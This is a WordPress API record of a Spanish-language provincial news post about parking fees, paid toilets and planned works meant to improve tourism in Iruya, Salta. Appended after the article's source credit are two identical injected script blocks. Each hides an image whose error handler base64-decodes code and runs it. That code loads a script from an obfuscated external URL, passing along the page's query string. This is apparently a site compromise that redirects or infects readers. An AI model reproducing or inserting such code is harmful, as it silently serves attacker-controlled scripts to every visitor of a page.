{"id":4176,"date":"2024-07-05T11:32:49","date_gmt":"2024-07-05T14:32:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4176"},"modified":"2025-08-13T23:53:12","modified_gmt":"2025-08-14T02:53:12","slug":"medidas-para-optimizar-la-experiencia-turistica-en-iruya","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4176","title":{"rendered":"Medidas para optimizar la experiencia tur\u00edstica en Iruya"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-ee0be7d11dc211914f71466556b1f8ae\" style=\"background-color:#55042e\"><em>En el marco de un canal de di\u00e1logo entre el Ejecutivo provincial, gobiernos municipales y el sector privado, se acordaron nuevas medidas que optimizar\u00e1 la experiencia del turista en la localidad andina, entendiendo las necesidades de un municipio en particular y el turismo de la provincia.<\/em><\/h5>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;se reuni\u00f3 con el intendente de Iruya&nbsp;<strong>Eugenio Herrera<\/strong>&nbsp;quien inform\u00f3 que se avanzar\u00e1 desde el Concejo Deliberante local, en una nueva normativa que permita a la comuna financiar los servicios que brinda al visitante, pero no as\u00ed una tasa por el ingreso a la localidad.<\/p>\n\n\n\n<p>Por tal motivo, se establecer\u00e1 un sector para el estacionamiento vehicular con cobro diferenciado dependiendo del tipo de movilidad, autos, camionetas, combis, para que el visitante ingrese al ejido urbano de forma peatonal como se hace en otros destinos destacados del pa\u00eds y el mundo. Quedar\u00e1n exceptuados de esta norma, quienes tengan reserva en establecimientos de alojamiento.<\/p>\n\n\n\n<p>Por otra parte, la Municipalidad de Iruya cuenta con sanitarios p\u00fablicos que tambi\u00e9n tendr\u00e1n un arancel que permitan preservar la calidad del servicio.<\/p>\n\n\n\n<p>Adem\u00e1s en la reuni\u00f3n se avanz\u00f3 en la charla de obras para potenciar el deporte en el complejo municipal y la experiencia del turista en el Mirador de la Cruz.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/medidas-para-optimizar-la-experiencia-turistica-en-iruya-96570\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de un canal de di\u00e1logo entre el Ejecutivo provincial, gobiernos municipales y el sector privado, se acordaron nuevas medidas que optimizar\u00e1 la experiencia del turista en la localidad andina, entendiendo las necesidades de un municipio en particular y el turismo de la provincia. El ministro de Turismo y Deportes&nbsp;Mario Pe\u00f1a&nbsp;se reuni\u00f3 con [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4177,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-4176","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4176"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4176"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4176\/revisions"}],"predecessor-version":[{"id":6747,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4176\/revisions\/6747"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4177"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4176"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4176"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4176"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}